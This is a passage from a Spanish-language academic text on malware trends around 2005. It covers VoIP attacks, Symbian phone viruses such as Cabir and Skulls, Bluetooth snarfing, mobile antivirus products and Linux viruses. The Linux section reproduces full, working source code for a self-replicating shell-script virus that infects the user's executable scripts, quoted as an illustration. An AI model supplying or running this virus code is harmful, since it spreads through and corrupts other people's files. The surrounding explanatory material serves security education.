En los últimos años se ha notado una rápida evolución de los códigos maliciosos, los cuales son capaces de infectar de diferentes formas y en diferentes plataformas e incluso de defenderse y desactivar algunos productos antivirus. Es por este motivo que también los antivirus han tenido que evolucionar para proteger mejor la información que los usuarios guardan en sus computadoras. En el 2004 surgieron ataques de diferente índole donde los antivirus no fueron suficientes para proteger los datos contenidos en una PC y mucho menos en toda una red empresarial, se ha tenido que agregar al sistema de seguridad un Firewall para cada equipo a nivel de PC’s de escritorio, que evite la entrada de nuevos códigos tales como: caballos de Troya, Spywares, y otros programas que intentan acceder a la PC por diferentes puertos que permanecen abiertos de manera predefinida. El futuro de los virus en los próximos años puede estar enfocado a la llegada de nuevo hardware móvil como tarjetas de memoria, computadoras de bolsillo y teléfonos celulares con mayores opciones, parece ser que el nuevo objetivo de los creadores de virus y códigos maliciosos en general será precisamente estos nuevos dispositivos, como esta empezando a suceder en Europa en donde la telefonía celular ha crecido en gran proporción. De esta manera tenemos que el aumento de códigos a nivel de telefonía celular pueda ser el mayor riesgo. Gusanos como Cabir.A pueden acrecentarse al encontrarse abierto y disponible el código por parte de sus creadores. Lo que alienta a otros programadores a crear nuevas versiones sin tanto trabajo. La mejor forma para que el usuario este protegido es mantenerse al día sobre las amenazas y riesgos de seguridad que van surgiendo en los equipos que se tengan, además de obtener las últimas herramientas que se encuentren disponibles por parte de los fabricantes (Saavedra, 2005)60. Los virus de computadora podrían llegar a tener un gran alcance en la salud de las personas ya que virus similares a los que hoy atacan a las computadoras personales podrían en el futuro "enfermar" a aquellas partes del cuerpo humano donde se utilicen implantes cibernéticos. Según la amenazadora visión del profesor británico de cibernética Kevin Warwick publicada en "Globe and Mail”, los hackers podrían de ésta manera tomar el control de partes del cuerpo humano y aun del sistema nervioso de sujetos implantados (Gallo, 2005)27. La telefonía IP está creciendo a un ritmo sin precedentes. Paralelamente aumenta el interés de los intrusos informáticos por vulnerar los servicios VoIP. Un número cada vez mayor de usuarios de Internet ha constatado las ventajas de la telefonía IP. Sin embargo, la gran mayoría aún no se percata de los riesgos de seguridad a los que está expuesta tal tecnología.

75

Al respecto, la compañía de seguridad informática Symantec previene que los ataques de hackers contra sistemas de telefonía IP irán en aumento, a la par con la propagación de tales sistemas (Diarioti, 2005)17. Entre los métodos que podrían emplearse figuran: - Audio-spam acústico que llenará el contestador automático con publicidad de voz. Skype, por ejemplo, cuenta con un servicio de contestador automático. - Phishing telefónico, en que se intenta inducir a los usuarios a proporcionar información personal por teléfono. - Manipulación del visor de identificación de llamadas. De esa forma, se intentaría inducir a los usuarios a creer, por ejemplo, que está recibiendo una llamada del banco. -Secuestro de líneas telefónicas, que desviarán las llamadas a estafadores. Aparte Symantec pronostica un renacer de una antigua forma de hacking. Los intrusos realizarán miles de llamadas telefónicas al azar, hasta que responda un número con señal digital. Entre tales números se buscan agujeros de seguridad en servidores desprotegidos, con el fin de vulnerarlos (Diarioti, 2005)17. 7.1 EL SISTEMA OPERATIVO SYMBIAN Muchas personas alrededor del mundo usan teléfonos celulares para establecer una comunicación local o de larga distancia. Sin embargo, con los celulares de recientes generaciones se tienen más servicios y aplicaciones: fotografía, video, juegos multimedia, envío y recepción de correos electrónicos o mensajes instantáneos, navegación en Internet, etc. Poco a poco, el teléfono celular se ha transformado de un dispositivo de comunicación auditiva básica a virtuales centros de entretenimiento y asistencia de información personal. Un teléfono celular es un radio, muy sofisticado, pero en esencia un radio, como un sintonizador de AM/FM. Como bien se conoce, el teléfono fue inventado en 1876 por Alejandro Graham Bell, y las comunicaciones sin cables o wireless fueron desarrolladas por Nikolai Tesla en 1880 y formalmente presentadas, por el italiano Guglielmo Marconi en 1894; en los últimos 20 años estas tecnologías se han ido integrando en los celulares. Para lograr las nuevas funcionalidades que tiene un teléfono celular se necesita cierta inteligencia, además es indispensable contar con un sistema operativo. Symbian es uno de los más importantes y funcionales, aunque existen otros como Palm® que funciona en asistentes digitales personales (PDA, por sus siglas en inglés), los cuales se hicieron populares por su interfaz que utiliza una pluma

76

electrónica y reconoce la escritura a mano en su pantalla; o Windows CE de Microsoft®, una variante del sistema operativo Windows, que se integra a diversos dispositivos electrónicos con mínima capacidad de almacenamiento, incluyendo PDAs y teléfonos móviles (Rodríguez, 2005)59. Symbian fue diseñado para integrarse fácilmente, con el software y el hardware en dispositivos móviles. Los sistemas que utilizan Symbian pueden ser divididos en cuatro categorías: serie 60, para teléfonos que el usuario maneja con una sola mano; serie 80, para teléfonos con pantalla horizontal grande y teclado; serie UIQ, para teléfonos que utilizan una pluma electrónica similar a los asistentes digitales; y otros, para futuros desarrollos o que no están en las categorías anteriores. Symbian es producto del trabajo conjunto de varias empresas líderes en telefonía celular, como Nokia®, Ericsson®, Motorola® y Psion®, quienes fundaron esta empresa en 1998 con el objeto de desarrollar un sistema operativo abierto para las diversas plataformas de teléfonos móviles. A diferencia de cualquier computadora, la programación de los teléfonos celulares tiene sus limitaciones. Es por esto que Symbian está diseñado para residir en un espacio muy pequeño, hacer un uso dinámico de escasos recursos de memoria, administrar eficientemente la energía y soportar en tiempo real los protocolos de comunicación y telefonía, además de ser más “gentil” con el usuario y tolerante a fallos, en comparación con un sistema operativo de PC. Por ejemplo: cuando se le quita la batería al teléfono mientras está encendido, el usuario esperaría que su información se encuentre íntegra al volver a activarlo, y no frustrarse por el hecho de que sus datos guardados se hayan perdido o peor: que el teléfono deje de funcionar, porque el sistema operativo se dañó cuando ocurrió el corte de energía. Técnicamente, el sistema operativo Symbian es una colección compacta de código ejecutable y varios archivos, la mayoría de ellos son bibliotecas vinculadas dinámicamente (DLL por sus siglas en inglés) y otros datos requeridos, incluyendo archivos de configuración, de imágenes y de tipografía, entre otros recursos residentes. Symbian se almacena, generalmente, en un circuito flash dentro del dispositivo móvil. Gracias a este tipo de tecnología, se puede conservar información aun si el sistema no posee carga eléctrica en la batería, además de que le es factible reprogramarse, sin necesidad de separarla de los demás circuitos. Las aplicaciones compatibles con Symbian se desarrollan a partir de lenguajes de programación orientados a objetos como C++, Java (con sus variantes como PJava, J2ME, etc.), Visual Basic para dispositivos móviles, entre otros, incluyendo algunos lenguajes disponibles en versión libre. La extensa variedad de aplicaciones que se pueden desarrollar van desde administradores de archivos hasta visualizadores de películas, guías de ciudades, mapas, diccionarios, emuladores de juegos, por mencionar algunas.

77

Cada aplicación se puede instalar en el teléfono con la ayuda de una computadora, una interfaz USB o Firewire, dependiendo del modelo de teléfono y el cable correspondiente. Las aplicaciones se graban en la memoria flash del teléfono dentro del proceso de sincronización de archivos, contactos y correos electrónicos (Rodríguez, 2005)59. Symbian es actualizable. Esta tarea la puede realizar el usuario, dependiendo del modelo de su equipo, a través de los sitios en Internet de los fabricantes de teléfonos o al obtener el disco compacto o tarjeta de memoria flash de los distribuidores autorizados. Adicionalmente, Symbian proporciona una interfaz gráfica fácil de comprender, llena de íconos y opciones, con lo cual se evita que el usuario deba de aprender manuales inmensos para explotar las capacidades del equipo de comunicación móvil. Sin embargo, Symbian también es vulnerable a los virus que afectan a computadoras personales y asistentes digitales (PDA). La manera más común de contagio es cuando el aparato está en comunicación con algún otro dispositivo contaminado en la red local (si el teléfono es compatible con la norma IEEE 802.11) o en la una red personal (si es compatible con Bluetooth). Pero menos frecuente es la infección por mensajes cortos (MMS); sin embargo, estos virus pueden bloquear aplicaciones e incluso el sistema de archivos, no obstante, también hay métodos para prevenirlos y eliminarlos instalando programas antivirus. Por otra lado, Symbian contiene una muy variada y extensa colección de bibliotecas para implementar muchos de los estándares de la industria de teléfonos de generación 2, 2.5 y 3. En la capa de software de sistema, en su versión 6, incluye soporte de distintos servicios (Tabla 1). Tabla 1. Capa de Software Servicios Redes Comunicaciones Navegadores de Internet Telefonía Multimedia Protocolos TCP/IP, SSL, FTP, etc. Bluetooth, WiFi HTML, HTTPS, WAP GSM, GPRS, CDMA2000, EDGE, WCDMA WAV, JPEG, MP3, etc.

En la Tabla 1, se puede ver que Symbian es un sistema muy completo, diseñado prácticamente para cualquier dispositivo móvil. Además de la gran comunidad de desarrolladores que trabajan en este sistema, su plataforma abierta permite la instalación de una gran variedad de programas que poco a poco mejorarán su funcionamiento, a favor de la versatilidad de las comunicaciones personales (Rodríguez, 2005)59.

78

7.2 LOS VIRUS EN CELULARES El sueño de un mundo conectado en el que los ordenadores personales y los teléfonos móviles puedan comunicarse con los hogares digitales así como con otros dispositivos prometen hacer la vida más fácil pero puede convertirse en una pesadilla, ya que podría hacer que la vida fuera más peligrosa si los desarrolladores de software maligno encuentran la manera. No se habla sólo de perder el número de la tarjeta de crédito, ya que, en la medida en que los microchips y el software están cada vez más presentes en nuestra vida diaria, como en coches, casas y teléfonos móviles, las amenazas se multiplican. De hecho, los primeros programas conocidos, aunque simples, son un “buen” comienzo. Los servicios móviles de algunos países permiten ver a los usuarios qué está pasando dentro de sus hogares vía webcam, que envía las imágenes por Internet a cualquier dispositivo. Pero esta misma webcam puede ser empleada por un pirata para ver si hay alguien en casa o para violar la intimidad de las personas. En un futuro, podría incluso darse la situación de que un hacker accediera al teléfono móvil de una persona mientras conduce para bloquearle los frenos del coche. Además, algunos expertos en seguridad consideran que al mismo tiempo que se incrementa la seguridad en ordenadores y servidores, crecen las amenazas en la seguridad individual y de los pequeños dispositivos. De hecho, estas mismas fuentes creen que los teléfonos 3G serán el próximo objetivo a abatir por parte de los delincuentes informáticos. Una prueba más de esta tendencia son los datos que facilita la compañía de seguridad F-Secure, quien ya ha detectado 87 programas malignos para móviles, la mayoría de ellos (82 de los 87 programas) tenían como objetivo el sistema operativo serie 60 de de Symbian. Sin embargo, esto se debe a que es el sistema más popular, no a que este sea el más inseguro (Herranz, 2005)32. Cabir es un virus que apareció en los celulares en España en el Mundial de Atletismo de Helsinki, entra en los teléfonos a través de un mensaje y se reenvía solo. Mensajes que esconden códigos maliciosos han empezado a irrumpir en los móviles. Aunque en un principio no se detectan anomalías, el virus se instala en el teléfono para siempre. Nokia, ha sido el caldo de cultivo con el cual se han reproducido estos virus informáticos que afecta a los móviles. El número de afectados puede ser sólo de unas docenas de terminales, pero la cifra no deja de ser importante. Según portavoces de la operadora TeliaSonera, el código dañino se ha extendido en un corto periodo de tiempo.

79

Cabir se detectó por primera vez en junio del 2004. Este aprovecha la conexión Bluetooth que incorporan los teléfonos de última generación para expandirse (Muñoz, 2005)51. Esto hace que se limite su capacidad de propagación a los terminales que se encuentran a una distancia máxima de 10 metros. Pero en un espacio donde la gente se encuentra tan apretada como en un estadio, esto no parece un obstáculo. El usuario del teléfono móvil afectado recibe por esta vía un mensaje en el que se le pide que descargue un programa, si lo hace y lo instala, resultará infectado. El virus se dedicará entonces a reenviarse a otros móviles hasta agotar la batería del aparato infectado (Muñoz, 2005)51. 7.2.1 Troyanos en celulares. Hace un tiempo, el pensar que un código maligno (un troyano por ejemplo), pudiera atacar a un teléfono celular, podría ser algo poco creíble. El envío de un simple mensaje SMS (un correo electrónico recibido en un celular), podría bloquear el equipo, e impedir que este siga funcionando. En una conferencia de hackers pertenecientes al grupo sombrero negro (Black Hat), un investigador de origen holandés, demostró que con la sencilla modificación de un programa ya existente, se puede enviar un mensaje SMS modificado maliciosamente, desde cualquier computadora conectada a Internet, y bloquear el celular que lo recibe. Esto fue demostrado en los modelos de telefonía celular Nokia 6210, 3310 y 3330, pero no se descarta afecte a modelos de otros fabricantes, ya que simplemente no se han efectuado pruebas con ellos todavía. Si el celular recibe el mensaje, el teléfono literalmente "se cuelga", y es imposible que este vuelva a encender. La clave del contagio esta en la manipulación y modificación malintencionada del titulo de la información enviada (técnicamente la llamada User Data Header). La solución definitiva al problema, pasa por el cambio de la tarjeta SIM incorporada en el celular, por una nueva que no sea susceptible a la falla, o el cambio por un nuevo modelo. Los mensajes maliciosos pueden ser borrados desde una PC con el software adecuado. Sin embargo, adaptar el ataque a diferentes modelos de celulares, requiere por parte del atacante, amplio conocimiento de los diferentes protocolos. Nokia no se sorprende que el bloqueo pueda ocurrir (ya que parece suceder por si solo en contadas ocasiones), pero si confesó no conocer que se pudiera hacer en forma premeditada como se demostró en la conferencia (Vsantivirus, 2005)70.

80

Pero en septiembre del 2005, aparecieron nuevos virus como el Commwarrior. B y Skulls que funcionan de modo distinto al Cabir, pues son Troyanos que se filtran en los celulares camuflados en otros programas aparentemente inofensivos. Commwarrior. B entra con el programa Doomboot.A y se le atribuye potencial para extenderse mediante mensajes multimedia; aunque realmente no ha conseguido autoenviarse en ninguno de los casos detectados en celulares, por lo que su efecto más nocivo es la brusca descarga de la batería. También es exclusivo de los celulares con el sistema operativo Symbian. En este caso no hay acuerdo sobre su foco de infección: mientras algunos expertos se inclinan por la posibilidad del Bluetooth como vía, otros apuntan a la descarga de juegos Java para móvil desde Internet. Si bien Skull es mucho más nocivo, entre sus funciones no está el propagarse de móvil a móvil, pero se propaga al descargarse desde la red. Skull se encuentra en algunas páginas de software para Symbian, donde aparece camuflado bajo la frase Extended Theme Manager para el modelo Nokia 7610. En realidad se trata de un Troyano nocivo que desactiva aplicaciones internas del teléfono como mensajería, agenda o navegación Web y las cambia por versiones que no funcionan. Actúa cambiando los iconos de las distintas funciones por una calavera. De este modo, el celular infectado deja de ser útil y queda trabajando para solo efectuar y recibir llamadas telefónicas (Consumer, 2005)13. 7.2.2 Cómo neutralizar los ataques. Existen numerosas páginas donde se explica cómo actuar en caso de que un móvil sea infectado por un virus. Cabir: El organismo estatal red.es tiene a disposición del usuario una página de alerta anti-virus donde se explica el modo de operar en caso de ataque por Cabir. Commwarrior. B: La empresa finlandesa F-Secure ya ha comenzado a comercializar el anti virus que combate Commwarrior. B. De todos modos, se puede descargar una versión gratuita de prueba hábil durante treinta días. Skulls: Donde también F-Secure permite descargar el contra esta amenaza. (Consumer, 2005)13. 7.2.3 Seguridad en los celulares. La seguridad en los teléfonos móviles está en la agenda de la mayoría de los operadores de telefonía móvil en todo el mundo, aun cuando los consumidores no se lo han pedido. Sonera, unidad finlandesa del operador nórdico TeliaSonera, así como y sus rivales en la tierra de origen del gigante de la telefonía móvil Nokia han estado entre las primeras empresas de telefonía móvil en optar por software de seguridad.

81

Tuukka Toivonen, jefe de cuentas empresariales de la operadora finlandesa Elisa, comenta que "en el lado empresarial, la demanda está ya ahí. Los gerentes de tecnologías de la información han comprendido el asunto. Pero para los consumidores es todavía demasiado agresivo". (El PAIS, 2005)22. "En los teléfonos ‘inteligentes', la cuestión de la seguridad de los datos es similar a la que se tiene en los computadores personales hoy en día", afirma, añadiendo que el software de seguridad, "un requisito necesario" para los teléfonos móviles dentro de cinco años. F-Secure, líder del mercado mundial en seguridad de telefonía móvil, ha ganado cinco de los ocho contratos promulgados por los operadores, y espera generar beneficios de su negocio de telefonía móvil entre 2006 y 2008. Además de Elisa y Sonera, tiene contratos con la Swisscom y con la unidad móvil de Deutsche Telekom, T-Mobile, en Alemania. Orange, una unidad de France Telcom, está dirigiendo este servicio en Suiza. El productor de software de seguridad estadounidense McAfee a anunciado que esperaba que los productos de seguridad para móviles comenzasen a generar ganancias lentamente el próximo año y contribuir más en 2007. "Algunos operadores han elegido buscar software antivirus para móviles y crear nuevas empresas. La gran mayoría, sin embargo, están satisfechos desplazándose más cautelosamente", comentó Aaron Davidson, consejero delegado de Simworks, la empresa de antivirus con base en Nueva Zelanda. "A pesar de la creencia popular, la mayoría de los operadores se mueven lentamente y bajo mi punto de vista, el mero hecho de que estén interesados en evaluar las soluciones es un gran paso adelante". Para proveer mayor seguridad a los usurarios de telefonía móvil los celulares que se vendan a finales del segundo semestre del 2006 podrían ser mucho más seguros que los actuales, gracias a un nuevo estándar de seguridad cuya especificación final está prevista para la primera mitad del año próximo El nuevo estándar de securización de dispositivos móviles está siendo desarrollado por Trusted Computing Group (TCG), asociación en la que participan fabricantes de las dimensiones de Motorola, Nokia y Samsung, y que ya cuenta en su haber con otras normas de seguridad para PC, servidores y redes. En la conferencia Cellular Telecommunications & Internet Association Wireless IT & Entertainment que se celebra en San Francisco, TCG lanzó un documento en el que se definen los escenarios de uso del nuevo estándar, como el bloqueo de los terminales en caso de pérdida, la gestión de parches y actualizaciones de software, y los pagos seguros por el móvil.

82

Según Roger Kay, miembro del consejo asesor de TCG, aunque todavía queda mucho trabajo por delante antes de finalizar el estándar, “ya se han detallado las áreas que cubrirá y el calendario para su desarrollo”. De acuerdo con los planes de la asociación, se espera que la especificación esté públicamente disponible en la primera mitad de 2006. Así, los primeros productos que soporten el nuevo estándar de seguridad podrían aparecer en el mercado a finales de este año (El PAIS, 2005)22. 7.2.4 Hackers en los celulares. Los hackers se pueden aprovechar de los calendarios, las listas de contactos y otra información personal, o convertir el celular en un dispositivo para escuchar las conversaciones sin que estos sean descubiertos. Los virus de los móviles pueden dejar un móvil completamente inhabilitado. Pocos usuarios de teléfonos móviles han resultado realmente dañados por estos huecos de seguridad. Pero los expertos dicen que las amenazas son más serias con la aparición de los celulares que funcionan como pequeños ordenadores capaces de comunicarse de diversas maneras. "Hay un gran número de dispositivos vulnerables los cuales ya se están usando, e inevitablemente esto afectará a los propietarios de esos dispositivos", dicho por Adam Laurie, en una entrevista realizada por e-mail, quien es experto en seguridad y quien ha revelado ya varios agujeros de seguridad. Debido a que proveedores como Cingular mantienen un duro control en las redes, los usuarios han evitado los Spam, el espionaje y otras molestias que afectan a los usuarios de ordenadores. Pero esto no quiere decir que sean inmunes a otras amenazas. Laurie demostró que podía copiar los calendarios y las listas de contacto de 46 diputados británicos y convertir sus teléfonos en un perfecto dispositivo para escuchar todas sus conversaciones. Laurie fue capaz de hacer uso de sus teléfonos usando el Bluetooth, una tecnología inalámbrica de corto alcance incluida en la mayoría de los nuevos teléfonos y que permite a los usuarios distribuirse los unos a los otros la información de los contactos, hablar a través de la radio del coche y conectarse con un ordenador sin necesidad de cables (IBLNEWS, 2005)34. En la conferencia de "Hack in the Box", realizada en la capital de Malasia, los asistentes fueron testigos de una demostración sobre los defectos de seguridad encontrados en Java 2 Micro Edition o J2ME, software desarrollado por Sun Microsystems y que se encuentra presente en los terminales de nueva generación de Nokia, Sony Ericsson y Motorola, entre otros. La vulnerabilidad del software, que viene incluído en teléfonos "inteligentes" fabricados por estas compañías, está relacionada con la manera en que Java trata de evitar que el sistema operativo acepte órdenes desde el exterior.

83

"La nueva generación de teléfonos en realidad viene con un software mucho más poderoso dentro del sistema operativo", declaró Dylan Andrew, el organizador del encuentro. "Hemos encontrado nuevos ataques que afectan a éstas nuevas plataformas y que permiten al atacante, por ejemplo, tomar el control del teléfono celular en forma remota, quizás leer la agenda de direcciones o escuchar secretamente un conversación”. (Noticiasdot, 2005)52. A medida que aumenta el número de teléfonos móviles en manos de los usuarios, se incrementan los blancos para una nueva oleada de delincuentes virtuales (Noticiasdot, 2005)53. Más que el temor ante la aparición de virus para celulares, los expertos están preocupados por el surgimiento de prácticas de hackeo, conocidas como BlueSnarfing y BlueSniping, las cuales aprovechan serias vulnerabilidades encontradas en la tecnología Bluetooth para acceder y capturar la información almacenada en los teléfonos celulares que cuentan con esta tecnología inalámbrica. Para el BlueSnarfing se utiliza un programa creado por hackers ingleses que corre en un notebook convencional con interfaz Bluetooth, con el cual es posible capturar la información de los celulares vulnerables, el cual puede ser usado para espionaje corporativo. Así, los teléfonos pueden ser atacados remotamente para acceder y capturar la información contenida en los equipos, como la agenda de contactos, números telefónicos, citas o notas de calendario, incluso mensajes de texto. Los teléfonos son vulnerables cuando están en modo “visible”, es decir, con la funcionalidad Bluetooth disponible. Entre las posibilidades que ofrece a un usuario malicioso, figuran el "acceder al teléfono vulnerable para respaldar todos sus datos. En un caso extremo, es posible discar remotamente una llamada saliente desde el teléfono accesado, sin que el dueño del teléfono se de cuenta, para escuchar su conversación en forma secreta”. Las manifestaciones de estas vulnerabilidades permiten ataques de espionaje electrónico que comprometen la confidencialidad de la información, y deben ser la preocupación principal de los usuarios de estos teléfonos. En este caso, se suma el hecho de que los ejecutivos importantes y las autoridades suelen utilizar este tipo de aparatos de tecnología High End, por sus prestaciones como gran capacidad de almacenamiento de datos, conectividad inalámbrica y agendas electrónicas incorporadas. Norman Bennett, gerente general de Symantec, expresa que “en la medida que los dispositivos móviles se convierten cada vez más en una necesidad y aumenta el número de usuarios, son mayores las oportunidades para Hackers y otro tipo de conductas maliciosas. La lista ataques a dispositivos móviles crece rápidamente y

84

aunque aún no han tenido una propagación masiva, sí se han identificado varios en sistemas operativos como Pocket PC y Symbian, junto con algunas debilidades de la tecnología Bluetooth y es por esto que existe una preocupación al respecto, tanto por parte de los fabricantes de los dispositivos como de las empresas de seguridad”. Se podría pensar que los usuarios móviles y los administradores de sistema de redes inalámbricas encontrarán, en el corto plazo, los mismos tipos de amenazas contra sus sistemas móviles que las existentes en los equipos conectados por cable. Según Bennett, “hay que entender que hoy nos enfrentamos a tecnologías integradas, sistemas compartidos y lenguajes comunes, y hay que manejar esa convergencia tecnológica de forma integral, sin importar el soporte (Noticiasdot, 2005)53. Las amenazas contra los sistemas inalámbricos están evolucionando casi a la misma velocidad con la que aparecen estas tecnologías en el mercado y es por eso que es necesario que tanto los usuarios como los proveedores de servicios estén alerta ante estas nuevas amenazas. Estamos en un excelente momento para pensar en la tecnología inalámbrica y sus ventajas, sin embargo hay que estar conscientes de que la seguridad tiene necesariamente que ser la piedra angular”. Respecto del inminente aumento en los ataques a celulares por parte de hackers, Darío Bengoechea, Country Manager de Afina, señala que “para entender esto hay que pensar que los celulares se constituyen en el blanco de los hackers, en la medida en que se han ido masificando en todo el mundo e integrando nuevas funcionalidades de las redes inalámbricas de voz y datos. Desde este punto de vista, lo más probable es que en el futuro cercano sigamos viendo nuevos virus que infecten a celulares, especialmente a aquellos que tengan funcionalidades anexas de mensajería y conectividad vía Bluetooth, entre otras. No se trata de una situación alarmante por ahora, pero que sí debe ser conocida por los usuarios”. Muchos usuarios de teléfonos móviles se preguntan si estas amenazas son un tema para preocuparse. En ese sentido, Bengoechea afirma que “es un tema para preocuparse pero no más de lo que acontece en otros países. El primer virus para celulares detectado hace algún tiempo reunía condiciones muy específicas, como contar con el sistema operativo Symbian, que en Europa tiene una alta penetración y poseer conectividad Bluetooth, es decir, un universo acotado, pero no por eso insignificante. Recordemos que IDC considera que en el 2006 el 80% de los teléfonos móviles contará con tecnología Bluetooth. En tal sentido, tal como aconteció con los PCs o ha ocurrido con los asistentes personales digitales, será la propia industria la encargada de encontrar soluciones e informar a los usuarios”.

85

Respecto de las recomendaciones o medidas preventivas que debieran tomar los usuarios de móviles para evitar ser blanco de estos ataques, los expertos coinciden en que los usuarios deben conocer las capacidades y aplicaciones de los teléfonos que utilizan. Bengoechea, Country Manager de Afina, señala que “en el caso de amenazas de virus, deben informarse sobre las condiciones y cualidades técnicas de el celular, para saber si los modelos que se usan han sido atacados por algún virus o similares. Segundo, en caso de estar dentro de los probables modelos que sufran ataques, buscar la forma de desactivar las funcionalidades que puedan facilitar el contagio en caso de encontrarse en un probable foco de virus”. Por otro parte para evitar ataques de hackers, el consultor de Seguridad de NEOSECURE, Cristóbal Soto, indica que “las principales medidas preventivas que debe tomar el usuario son ser conservador al momento de decidir la instalación de una nueva aplicación en el teléfono, sobre todo si se baja de Internet y ser cuidadoso en el uso de tecnologías inalámbricas como Bluetooth, activándolas sólo en el momento que se va a utilizar” (Noticiasdot, 2005)53. 7.2.5 Antivirus para los celulares. Empresas como F-Secure Mobile AntiVirus ya ofrecen al mercado de la telefonía celular protección contra contenido malicioso, Ya que han aparecido los primeros virus y ya es posible crear código malicioso que dañe el teléfono hasta el punto de impedirte utilizarlo. Un virus puede causar una facturación falsa, divulgación de información almacenada, borrado, modificado o datos corruptos las funciones principales del antivirus son: - Protección transparente en tiempo real contra contenido malicioso en el dispositivo y en tarjetas de memoria. - Actualización automática de base de datos desde F-Secure Anti-Virus Research a las terminales móviles por HTTPS o por medio de mensajes SMS. - Detección automática de conexiones GPRS desde la terminal para actualizaciones. - Bases de datos antivirus firmadas digitalmente. La aplicación soporta los siguientes idiomas: ingles, finlandés, francés, alemán, italiano y español, es compatible con Nokia 6600, 6630, 6670, 6680, 7610, 6260 y 3230, y exige como requisitos de sistema: - 850 KB de espacio libre en memoria interna. - Conexión a Internet (F-Secure Corporation, 2005)26.

86

7.2.6 Virus para celulares que afectan a PCs. El Troyano Cardtrap.A, un código malicioso que ataca teléfonos basados en el sistema operativo Symbian, sería el primer virus de este tipo capaz de "saltar" a un computador, según informa la firma F-Secure. Es una amenaza informática de baja peligrosidad pero precursora de virus más sofisticados, el Troyano Cardtrap.A, uno de los primeros con la potencialidad de atacar tanto a celulares como computadores. El Cardtrap.A, que afecta a teléfonos móviles basados en el sistema operativo Symbian, este copia también dos gusanos (el Win32/Padobot.Z y el Win32/Rays) en la tarjeta de memoria de un celular afectado, los cuales pueden ser activados por el usuario al ejecutarlos en un PC. Debido a que requiere de la acción del usuario y a que no afecta a cualquier versión de Windows, el gusano es descrito como de baja peligrosidad por Fsecure. En cualquier caso, ejecutivos de la firma llamaron la atención sobre el creciente volumen de códigos infecciosos dirigidos a dispositivos móviles para los cuales ya se han detectado 83 nuevos virus (Mouse, 2005)50. 7.3 VIRUS EN LINUX Los virus pueden ser una amenaza en Linux. Existen varios. Lo que es cierto es que un virus en Linux no encontrará un lugar fructífero para propagarse. Primero el código del virus se debe ejecutar en ella. Lo que significa que se ha copiado un ejecutable corrupto desde otro sistema. En el mundo Linux, la práctica común es el pasar una aplicación a otro usuario dándole la URL donde se encuentra el software en lugar de enviar archivos ejecutables. Es decir, el virus viene de un sitio oficial, donde se puede detectar rápidamente. Una vez que una máquina se ha infectado, para conseguir extender el virus, este debería usarse como una plataforma de distribución para aplicaciones precompiladas, lo que es muy infrecuente. El hecho es que un fichero ejecutable no es un buen medio de transporte para una virus en el mundo del software libre. En lo que se refiere a la propagación dentro de una máquina, una aplicación corrupta sólo puede extenderse a los archivos que el usuario ejecuta y tenga permisos de escritura. El administrador prudente sólo trabajará como root para operaciones que realmente necesiten privilegios, no es se deseable ejecutar un nuevo software cuando se está conectado como root. Aparte de la instalación de una aplicación con Set-UID root, el riesgo es bastante pequeño. Cuando un usuario normal ejecute un programa infectado, el virus sólo afectará a los ficheros que pertenezcan a este usuario, lo informará la propagación a las utilidades del sistema.

87

Si los virus han representado una alucinación en Unix por mucho tiempo, es también debido a la diversidad de procesadores (y por tanto de los lenguajes ensambladores) y de librerías (y de los objetos referenciados) lo que ha limitado el rango de código precompilado. Hoy esto no es así, y los virus que infectaran los ficheros ELF compilados para Linux en un procesador i386 con GlibC 2.1 encontrarían un montón de objetivos. Además un virus podría escribirse en un lenguaje que no dependiera del host en el que se ejecutara. Por ejemplo, aquí está un virus para scripts de shell. Intenta introducirse en todos los scripts de shell encontrados bajo el directorio en el que se ejecuta. Para no infectar el mismo script más de una vez, el virus ignora los ficheros que tienen en la segunda línea el comentario "infectado" o "vacunado" (Blaess, 2005)8. #! /bin/sh # infectado ( tmp_fic=/tmp/$$ candidatos=$(find . -type f -uid $UID -perm -0755)

for fic in $candidatos ; do exec < $fic # Intenta leer la primera línea, if ! read line ; then continue fi # y verifica que sea un script. if [ "$line" != "#!/bin/sh" ] && [ "$line" != "#! /bin/sh" ] ; then continue fi # Lee la segunda línea. if ! read line ; then continue fi # ¿Está ya el fichero infectado o vacunado? if [ "$line" == "# vacunado" ] || [ "$line" == "# infectado" ] ; then continue fi # Sino lo infectamos: copiamos el cuerpo del virus, head -33 $0 > $tmp_fic # y el fichero original.

88

cat $fic >> $tmp_fic # Sobreescribimos el fichero original. cat $tmp_fic > $fic done rm -f $tmp_fic ) 2>/dev/null & El virus no se preocupa de esconderse o de esconder su acción, excepto que se ejecuta en segundo plano mientras permite al script original hacer su trabajo usual. Por supuesto, ¡no se debe ejecute este script como root! Sobre todo si cambia find. por find /. A pesar de la simplicidad de este programa, es muy fácil perder su control, sobre todo si el sistema contiene muchos scripts personalizados. La Tabla 2 (Virus en Linux) contiene información sobre los virus más conocidos en Linux. Todos ellos infectan ficheros ejecutables ELF insertando su código después de la cabecera del fichero y colocando detrás el resto del código original. A menos que se indique lo contrario, buscan objetivos potenciales en los directorios del sistema. En esta tabla, se puede ver que los virus en Linux no son puramente anecdóticos, aun cuando no sea demasiado alarmante, mayormente porque hasta ahora estos virus son inofensivos (Blaess, 2005)8. Tabla 2. Virus en Linux Nombre Bliss Diesel Kagob Satyr Vit4096 Winter Bomba Lógica Aparentemente inactiva Ninguna Ninguna Ninguna Ninguna Ninguna Sólo infecta los ficheros en el directorio actual. El código del virus ocupa 341 bytes. Sólo infecta los ficheros del directorio actual. Este virus alberga dos códigos diferentes, y puede infectar tanto ficheros Windows como ficheros Elf Linux. Sin embargo es incapaz de explorar otras particiones que en la que está alojado, lo que reduce su propagación. Usa un fichero temporal para ejecutar el programa original infectado Notas Desinfección automática del fichero ejecutable si se llama con la opción --bliss-disinfect-files-please

Winux

Ninguna

89

Como se observa el virus "Winux" es capaz de propagarse tanto en Linux como en Windows. Es un virus inofensivo y es más una prueba de posibilidades que un peligro real. Pero este concepto produce alteraciones, al pensar que un intruso podría saltar de una partición a otra, invadir una red heterogénea usando servidores Samba, etc. La erradicación sería difícil ya que las herramientas requeridas deberían estar disponibles para ambos sistemas a la vez. Es importante tener en cuenta que el mecanismo de protección de Linux que impide a los virus que trabajan bajo la identidad de un usuario normal corromper los sistemas de ficheros, ya no está disponible si se accede a la partición desde un virus funcionando en Windows. Toda precaución administrativa que se tome en Linux se vuelve inefectiva si se reinicia la máquina desde una partición Windows que "aloje" un eventual virus multiplataforma. Es un problema para cada máquina que use un arranque-dual con dos sistemas operativos; ¡la protección general de todo reside en el mecanismo de seguridad del sistema más débil! La única solución es evitar el acceso a particiones Linux desde una aplicación Windows usando un sistema de archivos encriptados (Blaess, 2005)8. Esto no está todavía 